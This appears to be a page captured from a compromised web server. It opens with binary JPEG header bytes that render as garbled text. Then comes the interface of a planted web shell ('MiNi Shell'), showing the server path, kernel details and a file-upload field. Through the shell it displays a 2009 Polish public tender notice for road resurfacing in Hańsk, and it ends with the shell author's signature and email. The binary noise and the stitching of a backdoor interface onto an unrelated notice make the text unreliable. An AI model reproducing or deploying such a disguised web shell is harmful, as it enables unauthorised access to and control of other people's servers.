JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/85019-N-2009.html

<p class="kh_header"><b>Włodawa: Remont nawierzchni ul. Parczewskiej w m. Hańsk Pierwszy w ciągu drogi wojewódzkiej Nr 819 Parczew - Kołacze - Łowcza - Wola Uhruska o długości 0,400 km realizowany w ramach umowy nr 16/F/09 z dnia 20.04.2009 r. zawartej pomiędzy Województwem Lubelskim a Gminą Hańsk</b><br>
<b>Numer ogłoszenia: 85019 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni ul. Parczewskiej w m. Hańsk Pierwszy w ciągu drogi wojewódzkiej Nr 819 Parczew - Kołacze - Łowcza - Wola Uhruska o długości 0,400 km realizowany w ramach umowy nr 16/F/09 z dnia 20.04.2009 r. zawartej pomiędzy Województwem Lubelskim a Gminą Hańsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:

1. Odtworzenie trasy i punktów wysokościowych				-        0,400 km,
2. Frezowanie nawierzchni asfaltowej						-      17,00 m3,
3. Mechaniczne oczyszczenie nawierzchni					-  2580,00 m2,
4. Skropienie warstw konstrukcyjnych 						-  2580,00 m2,
5. Wyrównanie podbudowy betonem asfaltowym 0/12,8				-      66,00 Mg,
6. Wykonanie nawierzchni z betonu asfaltowego 0/12,8 (w-wa ścieralna)	-  2580,00 m2.	

         Szczegółowy zakres robót zawarty jest w przedmiarze robót stanowiącym załącznik do SIWZ.
    
 Zgodnie  z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania  równoważne opisywanym.
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez
 Zamawiającego jest obowiązany wykazać, że oferowane roboty budowlane spełniają 
 wymagania określone przez Zamawiającego (ART. 30, UST. 5 ustawy)
 Ponadto Wykonawca zobowiązany jest do: 
    -  zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego, 
       w rejonie prowadzonych robót objętych umową, na podstawie sporządzonego
       we własnym zakresie, zgodnie z obowiązującymi przepisami, projektu organizacji 
       ruchu ( na czas prowadzonych robót ) zatwierdzonego przez Zarządzającego
       ruchem na drogach wojewódzkich tj. Dyrektora ZDW w Lublinie.
Wartość zamówienia netto: 81967,22 PLN.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.23-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 2000,00zł 
(dwa tysiące 00/100 złotych) 
2. Wadium może być wnoszone w formach określonych w art. 45, ust 6 ustawy Prawo zamówień publicznych. 
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000. 
4. Do oferty należy dołączyć dokument potwierdzający wniesienie wadium. 

UWAGA: 
1. Wadium w formie pieniężnej należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez  zamawiającego.  W myśl art. 63 ust. 3 pkt. 1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 r (Dz.U z 2002 nr 72 poz 665 j.t.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu powyższych przepisów, 
2. Wadium uważa się za wniesione w terminie jeżeli wpłynie na k-to ZDW w Lublinie przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) spełniają warunki wynikające z art.22 ust 1 ustawy tzn.:
    a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
         jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień,
    b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
         technicznym, a także osobami zdolnymi do wykonywania zamówienia, lub
         przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia
         potencjału technicznego i osób zdolnych do wykonania zamówienia,
    c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
    d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
2) wykażą się odpowiednim doświadczeniem, tj.:  w ciągu ostatnich 5 lat, a jeżeli okres
    prowadzenia  działalności jest krótszy - w tym okresie zrealizowali co najmniej 
    2 zamówienia, odpowiadające swoim rodzajem i wartością robotom
    stanowiącym przedmiot zamówienia, z podaniem wartości oraz daty wykonania i
    odbiorców oraz załączeniem dokumentów potwierdzających, że roboty zostały
    wykonane należycie.
3) wykażą się dysponowaniem osobami zdolnymi do wykonania zamówienia, 
    osobą do sprawowania funkcji kierownika robót branży drogowej posiadającą 
    uprawnienia budowlane oraz aktualne zaświadczenie odpowiedniego samorządu
    zawodowego.


4) wykażą się dysponowaniem sprzętem i transportem niezbędnym do wykonania zamówienia:
      a) rozkładarka mas bitumicznych - minimum 1 szt.
      b) skrapiarka do bitumu - 1 szt.
      c) szczotka mechaniczna - minimum 1 szt.
      d) walec drogowy samojezdny stalowy gładki - minimum 1 szt.
      e) walec drogowy samojezdny ogumiony  - minimum 1 szt. 
      f) samochód samowyładowczy - minimum 2 szt.
2. Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w 
    postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów.
    Sposobem dokonywania oceny spełniania warunków w postępowaniu będzie zasada
    - spełnia warunki lub nie spełnia warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie  spełnienia  warunków udziału w postępowaniu Wykonawca załączy do oferty następujące dokumenty:
1. Oświadczenie o spełnieniu warunków art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień  
    publicznych.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
    ewidencji  działalności  gospodarczej, jeżeli  odrębne przepisy wymagają wpisu
    do  rejestru  lub zgłoszenia do ewidencji  działalności gospodarczej,
    wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania 
    ofert, dokument potwierdzający prawo do reprezentowania podmiotu przez
    osoby podpisujące ofertę, w przypadku podpisania oferty i innych dokumentów przez 
    osoby, które nie są wymienione w odpisie albo zaświadczeniu.
3. Wykaz minimum 2 robót, o charakterze i zakresie odpowiadającym robotom stanowiącym
     przedmiot zamówienia, zrealizowanych  przez Wykonawcę w ostatnich pięciu latach 
     a jeżeli okres działalności jest krótszy w tym okresie  wraz z załączonym dokumentem
     potwierdzającym, że roboty te  zostały wykonane należycie.
4.  Wykaz osób przewidzianych do realizacji zamówienia.
5.  Wykaz niezbędnego do wykonania zamówienia sprzętu i transportu jakim dysponuje 
     Wykonawca.
6.    Ponadto Wykonawca obowiązany jest dołączyć do oferty:
     1) Dowód wniesienia wadium.
      2) Ofertę przetargową (z ceną netto i z podatkiem VAT), wraz z 
          kosztorysem ofertowym.
     3) Zaakceptowany wzór umowy i warunków do umowy   4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
         do oferty należy   załączyć   dokument   (np. odpowiednią  umowę) ustanawiający 
         pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
         albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
         publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
     5) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są
         wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie do ewidencji
         działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do
          reprezentowania podmiotu przez osobę/osby  podpisujące ofertę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.ebip.lublin.pl/zdw.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie, 22-200 Włodawa, ul. Lubelska 60   pokój nr 2 w godz. 07:00 - 15:00..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2009 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie, 22-200 Włodawa, ul. Lubelska 60  w pokoju nr 15 /sekretariat / 
Otwarcie ofert dnia 24/06/2009 r godz 09:10, pokój nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują: pisemnie, za pomocą faksu nr (0-82) 572-41-62 lub drogą elektroniczną na adres e-mail: rdw.wlodawa@zdw.lublin.pl
         Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną , każda ze stron    
na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
 Osoby uprawnione do porozumiewania się z Wykonawcami.
               1.   W sprawach technicznych - Krystyna Kowalewska   tel. ( 0-82) 572 19 52
            2. W sprawach   formalno-prawnych   związanych   z   postępowaniem 
             o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk, 
             Eugeniusz  Kiewczykowski  tel. (082) 572 16 35
Wobec treści ogłoszenia o zamówieniu, postanowień specyfikacji istotnych warunków zamówienia, czynności podjętych przez Zamawiającego w postępowaniu oraz

Creat By MiNi SheLL
Email: jattceo@gmail.com